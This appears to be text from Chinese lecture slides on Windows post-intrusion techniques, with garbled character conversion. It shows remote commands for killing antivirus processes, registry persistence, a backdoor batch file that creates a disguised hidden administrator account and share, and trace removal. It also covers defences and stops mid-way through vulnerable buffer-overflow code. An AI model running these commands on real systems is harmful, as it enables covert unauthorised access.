關(guān)閉自動(dòng)更新一旦入侵成功，攻擊者為了更方便控制遠(yuǎn)程主機(jī)，常采用以下手法：原那么就是：礙事的效勞統(tǒng)統(tǒng)關(guān)閉，方便之門(mén)統(tǒng)統(tǒng)開(kāi)啟編輯ppt遠(yuǎn)程計(jì)算機(jī)上的進(jìn)程查看和終止眾所周知，欲查看本機(jī)正在運(yùn)行的程序或進(jìn)程，可使用“任務(wù)管理器〞如何操縱遠(yuǎn)程主機(jī)上正運(yùn)行的程序或進(jìn)程呢？編輯ppt遠(yuǎn)程計(jì)算機(jī)上的進(jìn)程查看使用命令 tasklist：查看運(yùn)行的程序或進(jìn)程tasklist/s遠(yuǎn)程主機(jī)IP/u用戶名/p密碼編輯ppt遠(yuǎn)程計(jì)算機(jī)上的進(jìn)程終止taskkill/s遠(yuǎn)程主機(jī)IP/u用戶名/p密碼/pid進(jìn)程ID號(hào)這個(gè)命令很實(shí)用，常用于關(guān)閉遠(yuǎn)程主機(jī)中“阻礙你〞的程序，如殺毒軟件、防火墻軟件等但也要注意，現(xiàn)在很多平安防護(hù)軟件也道高一尺了。編輯ppt注冊(cè)表入侵注冊(cè)表〔Registry〕是Windows中的一個(gè)重要的數(shù)據(jù)庫(kù)用于存儲(chǔ)系統(tǒng)和應(yīng)用程序的設(shè)置信息。編輯ppt注冊(cè)表入侵〔regedit〕注冊(cè)表中有個(gè)很重要的區(qū)域，儲(chǔ)存有開(kāi)機(jī)自動(dòng)運(yùn)行的程序HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run編輯ppt注冊(cè)表入侵接前面內(nèi)容，如果想讓遠(yuǎn)程計(jì)算機(jī)執(zhí)行某個(gè)特定程序，也可以通過(guò)注冊(cè)表中添加啟動(dòng)項(xiàng)的方式來(lái)實(shí)現(xiàn)。注冊(cè)表編輯器(regedit)不僅可修改本地計(jì)算機(jī)上的注冊(cè)表，也可以修改到遠(yuǎn)程計(jì)算機(jī)上的注冊(cè)表編輯ppt注冊(cè)表入侵簡(jiǎn)易防范通過(guò)注冊(cè)表，可以修改、刪除計(jì)算機(jī)上的應(yīng)用程序設(shè)置因此攻擊者也多了一種入侵的手段。一種簡(jiǎn)易防范措施就是禁用RemoteRegistry效勞編輯ppt預(yù)留后門(mén)一般來(lái)說(shuō)，入侵一旦得手，攻擊者往往希望日后也能再次光臨，為了以防萬(wàn)一，攻擊者經(jīng)常預(yù)留后門(mén)。如創(chuàng)立新賬戶，開(kāi)設(shè)新的隱藏共享等等。附參考樣板〔把以下內(nèi)容存為批處理文件Sys.bat〕netuserIUSR_Internet123456/addnetlocalgroupadministratorsIUSR_Internet/addscconfiglanmanserverstart=autoscstartlanmanservernetshareadmins$=%windir%備注：注意每個(gè)環(huán)節(jié)的命名技巧，即盡量偽裝得真實(shí)些編輯ppt重啟、關(guān)閉遠(yuǎn)程計(jì)算機(jī)命令：shutdown用法一：shutdown-i調(diào)出圖形界面shutdown-r 重啟-s 關(guān)機(jī)-txxx秒 倒計(jì)時(shí)顯示-m\\遠(yuǎn)程主機(jī)IPshutdown–s–t10–m\\192.168.56.101編輯ppt可以看到有無(wú)連接情況去除入侵痕跡為了掩人耳目，常常需要做善后處理，即去除入侵痕跡。如刪除上傳過(guò)的無(wú)用文件，及時(shí)斷開(kāi)連接等。netuse*/del/y編輯pptIPC$入侵防范措施根據(jù)實(shí)際情況，一般常用的防范措施有：停用默認(rèn)共享，即C$、ADMIN$等netsharec$/delnetshareadmin$/del關(guān)閉文件共享效勞，即Server效勞徹底斷絕一切共享效勞功能折中方案：需要開(kāi)啟共享效勞時(shí)，在防火墻例外規(guī)那么中允許“文件和打印機(jī)共享〞，反之那么關(guān)閉。歸根結(jié)底，最正確方案就是為用戶賬戶設(shè)置強(qiáng)密碼編輯ppt緩沖區(qū)溢出編輯ppt概念緩沖區(qū)溢出指的是一種系統(tǒng)攻擊的手段，通過(guò)向程序的緩沖區(qū)寫(xiě)超出其長(zhǎng)度的內(nèi)容，造成緩沖區(qū)的溢出，從而破壞程序的堆棧，使程序轉(zhuǎn)而執(zhí)行其它指令，以到達(dá)攻擊的目的。編輯ppt原因造成緩沖區(qū)溢出的原因是程序中沒(méi)有仔細(xì)檢查用戶輸入的參數(shù)。緩沖區(qū)溢出就是將一個(gè)超過(guò)緩沖區(qū)長(zhǎng)度的字符串置入緩沖區(qū)的結(jié)果．編輯ppt后果向一個(gè)有限空間的緩沖區(qū)中置入過(guò)長(zhǎng)的字符串可能會(huì)帶來(lái)兩種后果一是過(guò)長(zhǎng)的字符串覆蓋了相鄰的存儲(chǔ)單元，引起程序運(yùn)行失敗，嚴(yán)重的可導(dǎo)致系統(tǒng)崩潰；另一種后果是利用這種漏洞可以執(zhí)行任意指令，甚至可以取得系統(tǒng)特權(quán)，由此而引發(fā)了許多種攻擊方法。編輯ppt基于堆棧的緩沖區(qū)溢出voidfunction(char*str){ charbuffer[4]; strcpy(buffer,str);}voidmain(int